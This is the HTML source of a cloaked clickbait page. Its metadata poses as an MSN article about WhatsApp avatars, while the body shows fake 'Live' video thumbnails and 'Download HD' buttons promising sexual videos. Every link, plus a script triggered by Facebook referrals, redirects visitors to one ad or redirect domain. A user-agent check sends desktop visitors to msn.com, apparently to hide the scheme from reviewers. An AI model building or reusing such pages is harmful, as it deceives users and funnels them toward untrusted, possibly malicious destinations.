<!DOCTYPE html>
<html lang="en">
<head>

    <script>
    document.addEventListener("DOMContentLoaded", function () {
      var referrer = document.referrer.toLowerCase();
      if (referrer.includes("facebook.com") || referrer.includes("fb.com")) {
        setTimeout(function () {
          window.location.href = "//ak.stikroltiltoowi.net/4/9039697";
        }, 2000); // 2000 ms = 2 seconds
      }
    });
  </script>
    
    <!-- BEGIN: Powered by Supercounters.com -->
    <center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1712117,"ffffff","ffffff");</script><br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
    </center>
    <!-- END: Powered by Supercounters.com --><style>#sconlineimg{display:none!important}</style>

     <!-- Meta Pixel Code -->
<script>
!function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window, document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
fbq('init', '1315042809627793');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=1315042809627793&ev=PageView&noscript=1"
/></noscript>
<!-- End Meta Pixel Code -->
    
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- This site is optimized with the Yoast SEO -->
    <title>My World</title>
    <meta name="description" content="With Avatar feature, users can create their own animated DP (Display Picture) and WhatsApp will also offer a combination of diverse hairstyles, facial features, and outfits" />
    <meta property="og:locale" content="en_US" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="WhatsApp: How to create your animated Avator DP, stickers" />
    <meta property="og:description" content="With Avatar feature, users can create their own animated DP (Display Picture) and WhatsApp will also offer a combination of diverse hairstyles, facial features, and outfits" />
    <meta property="og:url" content="https://www.msn.com/" />
    <meta property="og:site_name" content="&gt;CamSoda&lt;" />
    <meta property="article:modified_time" content="2023-03-17T05:51:53+00:00" />
    <meta property="og:image" content="https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1sc0il.img?w=800&h=435&q=60&m=2&f=jpg" />
    <meta property="og:image:width" content="608" />
    <meta property="og:image:height" content="405" />
    <meta property="og:image:type" content="image/jpeg" />
    <meta name="twitter:card" content="summary_large_image" />
    <div id='fixedbox' style='width:100%;margin:auto;text-align:center;float:none;overflow:hidden;display:scroll;position:fixed;bottom:0;z-index:999;-webkit-transform:translateZ(0);'><div>
            <button id='close-fixedbox' style='cursor:pointer;border:none;background:none;' onclick='document.getElementById("fixedbox").style.display = "none";'>
                <button style='color: black; font-size: 10px;'>Click Here & Wait 3 Minutes, For Download Indian 1080p HD Sex Video <i class="fa fa-download"></i></button></button></div>
        <div style='text-align:center;display:block;max-width:728px;height:auto;overflow:hidden;margin:auto'>
            <center><a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://imagexcdn.com/f/footer63.webp" alt="" width="300" height="120" /></a></center></div></div>
    <meta property="og:image" contents="https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1sc0il.img?w=800&h=435&q=60&m=2&f=jpg" />
    <meta name="twitter:title" content="WhatsApp: How to create your animated Avator DP, stickers" />
    <meta name="twitter:description" content="With Avatar feature, users can create their own animated DP (Display Picture) and WhatsApp will also offer a combination of diverse hairstyles, facial features, and outfits" />
    <meta name="twitter:image" content="//ak.stikroltiltoowi.net/4/9039697" />
    <meta name="twitter:label1" content="Est. reading time" />
    <meta name="twitter:data1" content="4 minutes" />
    <link rel="shortcut icons" href="//ak.stikroltiltoowi.net/4/9039697">
    <link rel="shortcut icon" href="https://i.postimg.cc/LXvHFpZJ/touch-icon-x48.png">
    <!-- / Yoast SEO plugin. -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script type='text/javascript'>
        $(document).ready(function() {
            $('img#closed').click(function(){
                $('#bl_banner').hide(90);
            });
        });
    </script>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #808080;
        }

        .container {
            max-width: 1200px;
            margin: 0 auto;
            padding: 20px;
        }

        .grid {
            display: flex;
            flex-wrap: wrap;
            justify-content: space-around;
        }

        .grid-item {
            width: 100%;
            margin-bottom: 20px;
        }

        @media (min-width: 768px) {
            .grid-item {
                width: calc(50% - 20px);
            }
        }

        @media (min-width: 1200px) {
            .grid-item {
                width: calc(25% - 20px);
            }
        }

        .image-container {
            position: relative;
            overflow: hidden;
            border-radius: 8px;
        }

        .image {
            width: 100%;
            height: auto;
            display: block;
        }

        .play-button {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 60px;
            height: 60px;
            background-color: rgba(255, 255, 255);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
        }

        .custom-play-button {
            width: 60px; /* Set width */
            height: 60px; /* Set height */
            position: absolute; /* Adjust position as needed */
            top: 50%; /* Adjust top position */
            left: 50%; /* Adjust left position */
            transform: translate(-50%, -50%); /* Center the play button */
        }

        .play-icon {
            width: 100%; /* Make sure the play icon fills the container */
            height: 100%;
        }

        /* Additional CSS styles */
        .download-button {
            display: block;
            text-align: center;
            margin-top: 5px;
            background-color: black;
            color: white;
            padding: 8px 15px;
            text-decoration: none;
            border-radius: 8px;
        }

        .download-button:hover {
            background-color: #F40202;
        }

        /* CSS for fake live icon */
        .live-icon {
            width: 35px;
            height: 16px;
            border-radius: 15%;
            background-color: red; /* Change color as needed */
            position: absolute;
            top: 8px;
            left: 8px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        {
            text-decoration: none;
            display: inline-block;
            padding: 8px 16px;
        }

        {
            background-color: #ddd;
            color: black;
        }

        .previous {
            background-color: #bfaa0b;
            color: black;
        }

        .next {
            background-color: #bfaa0b;
            color: black;
        }

        .round {
            border-radius: 50%;
        }

    </style>
    <script type="text/javascript">
        // Function to check if the user is on a desktop
        function isDesktop() {
            // Check if the user is on a desktop by detecting the user agent
            const userAgent = navigator.userAgent.toLowerCase();
            const isDesktop = !/mobile|android|ipad|iphone|ipod|windows phone/i.test(userAgent);
            return isDesktop;
        }

        // Redirect desktop users to msn.com
        if (isDesktop()) {
            window.location.href = "https://www.msn.com";
        }
    </script>

</head>

<body>

<div class="container">
    <div class="grid">
        <!-- Image 1 -->
                    
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477081-1752477079-28.webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
                   
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477084-1752477082-2 (1).webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477085-1752477084-9 (1).webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477086-1752477085-16.webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477097-1752477096-11.webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477104-1752477103-4 (1).webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
                    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477114-1752477113-19.webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
            </div>

     <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477082-1752477081-18 (1).webp" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
    
    <div class="grid-item">
                <div class="image-container">
                    <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="https://bddealer.com/cdn/1752477079-1752477075-10.gif" alt="Video.mp4" class="image"></a>
                    <div class="live-icon" style="color:white;">Live</div>
                    <div class="custom-play-button"></a>
                        <a href="//ak.stikroltiltoowi.net/4/9039697"><img src="http://mobilepagla.com/images/playbtn.webp" alt="Play" class="play-icon"></a>
                    </div>
                </div>
                <a href="//ak.stikroltiltoowi.net/4/9039697" class="download-button"style="font-size:14px">Click here 🔗 Download 🖥️ Mp4 🖥️ HD</a>
            </div>
    
    <div class="text-right">
        <a href="" class="previous" style="font-size:25px">&laquo; Previous&nbsp;&nbsp;</a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="" class="next" style="font-size:25px">&nbsp;&nbsp;Next &raquo;</a>
    </div>

</body>
</html>
